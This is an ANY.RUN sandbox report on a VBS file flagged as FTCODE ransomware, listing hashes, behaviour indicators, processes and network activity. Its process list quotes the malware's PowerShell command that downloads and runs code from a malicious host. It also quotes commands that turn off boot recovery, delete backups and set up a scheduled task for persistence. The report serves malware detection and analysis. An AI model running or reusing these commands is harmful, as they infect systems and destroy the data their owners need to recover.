analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Scan_New_Folder_8569959511050404395043105308886755597758373094.vbs

Full analysis: https://app.any.run/tasks/dc24154a-36f3-4fac-a596-a4c5d8c96b2a
Verdict: Malicious activity
Threats:

Ransomware is a type of malicious software that locks users out of their system or data using different methods to force them to pay a ransom. Most often, such programs encrypt files on an infected machine and demand a fee to be paid in exchange for the decryption key. Additionally, such programs can be used to steal sensitive information from the compromised computer and even conduct DDoS attacks against affected organizations to pressure them into paying.

Analysis date: October 09, 2019, 14:13:18
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
trojan
ransomware
ftcode
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF, LF line terminators
MD5:

BE611918FABC12048AEBA6E55F6559D7

SHA1:

4CB525212460FEDAE4820A7CFC39E47DB48C4C7B

SHA256:

07C226D6E4AB84A586B1A09F09896223412DE927513FDA6BF13B031DC497E686

SSDEEP:

48:KudJXRRAiRESdFZyRkRR8IRHRQRJf8i+:tdJBRAyTZCYR8sxEJ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Writes to a start menu file

      • powershell.exe (PID: 2460)
    • Uses Task Scheduler to run other applications

      • powershell.exe (PID: 2460)
      • powershell.exe (PID: 2744)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 2120)
      • mmc.exe (PID: 2360)
      • schtasks.exe (PID: 1452)
    • FTCODE was detected

      • powershell.exe (PID: 2460)
    • Deletes shadow copies

      • cmd.exe (PID: 2716)
      • cmd.exe (PID: 1576)
    • Starts BCDEDIT.EXE to disable recovery

      • cmd.exe (PID: 2888)
    • Renames files like Ransomware

      • powershell.exe (PID: 2460)
  • SUSPICIOUS

    • Reads the machine GUID from the registry

      • vlc.exe (PID: 2296)
      • WScript.exe (PID: 2584)
      • powershell.exe (PID: 2460)
      • mmc.exe (PID: 2360)
      • WScript.exe (PID: 2676)
      • powershell.exe (PID: 2744)
      • powershell.exe (PID: 2304)
      • WScript.exe (PID: 2980)
    • Creates files in the user directory

      • vlc.exe (PID: 2296)
      • powershell.exe (PID: 2460)
      • powershell.exe (PID: 2744)
      • powershell.exe (PID: 2304)
    • Executes PowerShell scripts

      • WScript.exe (PID: 2584)
      • WScript.exe (PID: 2676)
      • WScript.exe (PID: 2980)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 2460)
    • Creates files like Ransomware instruction

      • powershell.exe (PID: 2460)
    • Executed via Task Scheduler

      • WScript.exe (PID: 2676)
      • WScript.exe (PID: 2980)
  • INFO

    • Reads settings of System Certificates

      • powershell.exe (PID: 2460)
      • iexplore.exe (PID: 1952)
    • Manual execution by user

      • SndVol.exe (PID: 1972)
      • iexplore.exe (PID: 1952)
      • mmc.exe (PID: 2360)
      • mmc.exe (PID: 596)
    • Dropped object may contain URL to Tor Browser

      • powershell.exe (PID: 2460)
    • Dropped object may contain TOR URL's

      • powershell.exe (PID: 2460)
    • Changes internet zones settings

      • iexplore.exe (PID: 1952)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 1952)
    • Creates files in the user directory

      • iexplore.exe (PID: 1952)
    • Changes settings of System certificates

      • IEXPLORE.EXE (PID: 2944)
    • Reads the machine GUID from the registry

      • iexplore.exe (PID: 1952)
    • Adds / modifies Windows certificates

      • IEXPLORE.EXE (PID: 2944)
    • Reads internet explorer settings

      • IEXPLORE.EXE (PID: 2944)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
77
Monitored processes
26
Malicious processes
4
Suspicious processes
2

Behavior graph

Click at the process to see the details
start wscript.exe no specs #STOP powershell.exe vlc.exe schtasks.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs bcdedit.exe no specs cmd.exe no specs cmd.exe no specs bcdedit.exe no specs wbadmin.exe no specs cmd.exe no specs wbadmin.exe no specs wbadmin.exe no specs vssadmin.exe no specs sndvol.exe no specs iexplore.exe iexplore.exe mmc.exe no specs mmc.exe wscript.exe no specs powershell.exe schtasks.exe no specs wscript.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2584"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Scan_New_Folder_8569959511050404395043105308886755597758373094.vbs"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2460"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = $env:temp + '\ramst007.mp3';(New-Object Net.WebClient).DownloadFile('https://archive.org/download/RammsteinRammsteinMix/Cast_1_64kb.mp3',$a); Start-Process $a;iex ((New-Object Net.WebClient).DownloadString('http://ceco.myheritageins.com/?need=streetm&vid=vbs4&4643'));C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2296"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\admin\AppData\Local\Temp\ramst007.mp3"C:\Program Files\VideoLAN\VLC\vlc.exe
powershell.exe
User:
admin
Company:
VideoLAN
Integrity Level:
MEDIUM
Description:
VLC media player
Version:
2.2.6
2120"C:\Windows\system32\schtasks.exe" /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 10 /du 23:59 /TR C:\Users\Public\Libraries\WindowsIndexingService.vbsC:\Windows\system32\schtasks.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
840"C:\Windows\system32\cmd.exe" /c bcdedit /set vbwfatdjw bootstatuspolicy ignoreallfailures C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2888"C:\Windows\system32\cmd.exe" /c bcdedit /set vbwfatdjw recoveryenabled no C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1576"C:\Windows\system32\cmd.exe" /c wbadmin delete catalog -quiet C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
4294967294
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1724bcdedit /set vbwfatdjw bootstatuspolicy ignoreallfailures C:\Windows\system32\bcdedit.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Boot Configuration Data Editor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3048"C:\Windows\system32\cmd.exe" /c wbadmin delete systemstatebackup C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
4294967293
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2072"C:\Windows\system32\cmd.exe" /c wbadmin delete backup C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
4294967295
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
3 138
Read events
2 781
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
51
Text files
25
Unknown types
1

Dropped files

PID
Process
Filename
Type
2460powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HL3ZVOAYE3NWX44LR2D8.temp
MD5:
SHA256:
2460powershell.exeC:\Users\admin\AppData\Local\Temp\ramst007.mp3
MD5:
SHA256:
2296vlc.exeC:\Users\admin\AppData\Local\Temp\VLCE662.tmp
MD5:
SHA256:
2296vlc.exeC:\Users\admin\AppData\Local\Temp\VLCEDB6.tmp
MD5:
SHA256:
2296vlc.exeC:\Users\admin\AppData\Local\Temp\VLCEDB7.tmp
MD5:
SHA256:
2296vlc.exeC:\Users\admin\AppData\Local\Temp\VLCEDB8.tmp
MD5:
SHA256:
2296vlc.exeC:\Users\admin\AppData\Local\Temp\VLCEDC9.tmp
MD5:
SHA256:
2296vlc.exeC:\Users\admin\AppData\Local\Temp\VLCEDCA.tmp
MD5:
SHA256:
2296vlc.exeC:\Users\admin\AppData\Local\Temp\VLCEDCB.tmp
MD5:
SHA256:
2296vlc.exeC:\Users\admin\AppData\Local\Temp\VLCEDCC.tmp
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
21
DNS requests
21
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2460
powershell.exe
GET
200
31.214.157.155:80
http://ceco.myheritageins.com/?need=streetm&vid=vbs4&4643
NL
text
9.30 Kb
malicious
2460
powershell.exe
GET
200
31.214.157.155:80
http://ceco.myheritageins.com/?need=aegzfej&vid=vbs4&
NL
text
76.6 Kb
malicious
2744
powershell.exe
POST
200
185.212.47.91:80
http://cdn.unitycareers.com/
DE
text
24 b
malicious
2460
powershell.exe
POST
200
185.158.248.151:80
http://ceco.jasonrsheldon.com/
RO
text
2 b
malicious
2460
powershell.exe
POST
200
185.158.248.151:80
http://ceco.jasonrsheldon.com/
RO
text
2 b
malicious
2744
powershell.exe
POST
200
185.212.47.91:80
http://cdn.unitycareers.com/
DE
text
3.52 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1952
iexplore.exe
152.199.19.161:443
iecvlist.microsoft.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
1952
iexplore.exe
204.79.197.200:443
www.bing.com
Microsoft Corporation
US
whitelisted
2460
powershell.exe
207.241.224.2:443
archive.org
Internet Archive
US
malicious
2460
powershell.exe
207.241.228.42:443
ia802302.us.archive.org
Internet Archive
US
unknown
2460
powershell.exe
185.158.248.151:80
ceco.jasonrsheldon.com
M247 Ltd
RO
malicious
2460
powershell.exe
31.214.157.155:80
ceco.myheritageins.com
easystores GmbH
NL
malicious
2944
IEXPLORE.EXE
152.199.19.161:443
iecvlist.microsoft.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
1952
iexplore.exe
204.79.197.203:443
www.msn.com
Microsoft Corporation
US
whitelisted
1952
iexplore.exe
13.92.246.37:443
query.prod.cms.msn.com
Microsoft Corporation
US
whitelisted
2744
powershell.exe
185.212.47.91:80
cdn.unitycareers.com
23media GmbH
DE
malicious

DNS requests

Domain
IP
Reputation
archive.org
  • 207.241.224.2
whitelisted
ia802302.us.archive.org
  • 207.241.228.42
unknown
ceco.myheritageins.com
  • 31.214.157.155
malicious
ceco.jasonrsheldon.com
  • 185.158.248.151
unknown
api.bing.com
  • 13.107.5.80
whitelisted
www.bing.com
  • 204.79.197.200
whitelisted
iecvlist.microsoft.com
  • 152.199.19.161
whitelisted
r20swj13mr.microsoft.com
  • 152.199.19.161
whitelisted
ieonline.microsoft.com
  • 204.79.197.200
whitelisted
go.microsoft.com
  • 23.197.15.213
whitelisted

Threats

Found threats are available for the paid subscriptions
1 ETPRO signatures available at the full report
Process
Message
vlc.exe
core libvlc: one instance mode ENABLED
vlc.exe
core libvlc: Esecuzione di vlc con l'interfaccia predefinita. Usa 'cvlc' per utilizzare vlc senza interfaccia.
mmc.exe
Constructor: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe
OnInitialize: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe
AddIcons: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe
ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn